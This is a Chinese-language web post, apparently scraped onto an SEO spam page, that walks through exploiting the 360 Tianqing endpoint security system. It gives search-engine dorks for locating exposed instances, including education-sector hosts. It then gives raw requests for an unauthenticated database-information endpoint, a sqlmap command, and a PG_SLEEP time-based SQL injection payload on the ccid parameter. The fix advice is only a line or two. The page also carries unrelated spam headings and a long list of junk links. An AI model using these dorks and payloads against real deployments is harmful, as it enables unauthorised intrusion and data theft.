当前位置: 首页 > news >正文

网站推广优势百度地图网站开发

网站推广优势,百度地图网站开发,wordpress安装语言设置中文乱码,iis网站连接数据库失败目录 360天擎 - 未授权与sql注入 信息收集 FOFA语法 鹰图搜索 360天擎未授权访问 - 数据库信息泄露 漏洞复现 修复方案 360天擎终端安全管理系统ccid处SQL注入 漏洞复现 手动测试方法 修复方案 360天擎 - 未授权与sql注入 通常访问的页面如下,存在登录框…

目录

360天擎 - 未授权与sql注入

信息收集

FOFA语法

鹰图搜索

360天擎未授权访问 - 数据库信息泄露

漏洞复现

修复方案

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

手动测试方法

修复方案


360天擎 - 未授权与sql注入

通常访问的页面如下,存在登录框

信息收集

FOFA语法

  1. title="360新天擎"

需重点关注框框的图标,可以聚焦资产搜索

  1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法,相对来说资产较少,因为是老洞

  1. web.title="360新天擎"&& ip.isp="教育"

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

  1. GET /api/dbstat/gettablessize HTTP/1.1
  2. Host: {{Hostname}}

修复方案

未授权更多的是鉴权问题,增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

  1. GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

这时候丢到sqlmap中(可能会慢,因为是时间注入)

  1. python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

手动测试方法

360天擎用的大概率是PostgreSQL,尝试如下时间注入payload,然后注意页面响应时间

  1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

还没看够?可以关注一下呦~

http://www.15wanjia.com/news/178085.html

相关文章:

  • 大连市英文网站建设抖音代运营收费标准参考
  • 如何网站关键词优化关于市场营销的培训课程
  • 沈阳网站备案查询建e网全景制作教程视频
  • 赣州建设监督网站制作企业网站的问题
  • 江苏网站推广网络软件推广的渠道是哪里找的
  • 做神秘顾客哪个网站好wordpress iis 500.50
  • 仿牌网站容易被攻击吗蚌埠网页设计
  • 南岗红旗大街网站建设网页制作基础教程做不出来
  • 仕德伟做的网站网站建设 推广400电话
  • js 网站源码网站服务器怎么看是哪个厂家的
  • 网站开发w亿玛酷1流量订制钱网站制作
  • 公司的网站怎么运营怎么在华为防火墙做网站映射
  • 找工作哪个网站好找跨境电商怎么注册
  • 网站设计网络推广商贸平台重庆厂区招工招聘信息查询
  • vps除了做网站还能做什么广州微网站建设
  • 网站开发培训什么石家庄网站模板建站
  • 东莞免费企业网站模板推广网站开发线框
  • 手机网站预览404页面模板
  • 做网站v1认证需要付费吗wordpress和phpcms
  • 网站怎么做短信ip限定免费seo网站推荐一下
  • 滁州网站seowordpress 按点击调用热门文章
  • 福州企业网站建设专业服务扬中网站推广价格
  • asp.net 微网站开发教程建设网站可以赚钱吗
  • 南宁手机企业网站定制互动平台有效学时是什么意思
  • dede 网站内页标题修改wordpress会员分销
  • 深圳网站建设机构丰南建设局网站
  • 公司网站建设建议书怎样登录韵网网站
  • 网站备案组织机构代码wordpress做的网站效果6
  • 网站制作公司如何运作没有排名的网站怎么做
  • 农家院网站素材设计模版网站